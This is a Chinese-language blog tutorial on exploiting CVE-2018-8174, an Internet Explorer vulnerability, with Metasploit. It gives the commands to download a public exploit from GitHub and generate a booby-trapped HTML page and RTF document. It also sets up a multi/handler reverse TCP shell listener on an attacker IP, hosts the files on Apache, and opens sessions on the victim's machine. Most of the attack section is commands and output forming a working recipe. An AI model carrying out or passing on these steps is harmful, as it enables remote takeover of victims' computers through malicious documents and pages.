Metasploit实例-CVE-2018-8174漏洞(七)

1.1.1 利用CVE-2018-8174获取shell

0DAY漏洞最早的破解是专]针对软件的,叫做WAREZ,后来才发展到游戏,音乐,影视等其他内容的。0day 中的0表示zero,早期的Oday表示在软件发行后的24小时内就出现破解版本,现在我们已经引申了这个含义,只要是在软件或者其他东西发布后,在最短时间内出现相关破解的,都可以叫0day。

0day是一个统称,所有的破解都可以叫0day,CVE-2018-8174漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在2018年4月20日早上确认此漏洞,并于2018年5月8号发布了官方安全补丁,对该Oday漏洞进行了修复,并将其命名为CVE-2018-8174。

1.1.1.1 下载安装CVE-2018-8174_EXP

Github地址:https://github.com/Yt1g3r/CVE-2018-8174_EXP

# mkdir -p /root/msf
# cd /root/msf
# wget https://codeload.github.com/Yt1g3r/CVE-2018-8174_EXP/zip/refs/heads/master
# unzip master
# mv CVE-2018-8174_EXP-master CVE-2018-8174_EXP

1.1.1.2 使用脚本创建后门网址和文件

注意:此脚本需要python2版本进行使用!!!
# python CVE-2018-8174.py -u http://192.168.10.180/exploit.html -o hack.rtf -i 192.168.10.180 -p 4444
UNICODE_URL len 134 , need to pad ...
Generated hack.rtf successfully
!!! Completed !!!
  • 参数说明:

-u:URL地址,后门html文件

-o:生成后门文档

-i:攻击服务器地址,被攻击服务器要连接到的地址

-p:攻击服务器端口,被攻击服务器要连接到的端口

1.1.1.3 使用后门html

  • msf开启监听
msf6 > use exploit/multi/handler
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.10.180
LHOST => 192.168.10.180
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run -j
  • 开启下载网址:
# cp exploit.html hack.rtf /var/www/html
# systemctl start apache2.service

1.1.1.4 受害者打开网页

图片[1]|Metasploit实例-CVE-2018-8174漏洞(七)|leon的博客

  • 查看连接情况:
msf6 exploit(multi/handler) > sessions

图片[2]|Metasploit实例-CVE-2018-8174漏洞(七)|leon的博客

msf6 exploit(multi/handler) > sessions -i 2

图片[3]|Metasploit实例-CVE-2018-8174漏洞(七)|leon的博客

温馨提示:本文最后更新于2022-12-20 20:57:32,已超过431天没有更新。某些文章具有时效性,若文章内容或图片资源有错误或已失效,请联系站长。谢谢!
转载请注明本文链接:https://blog.leonshadow.cn/763482/3017.html
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享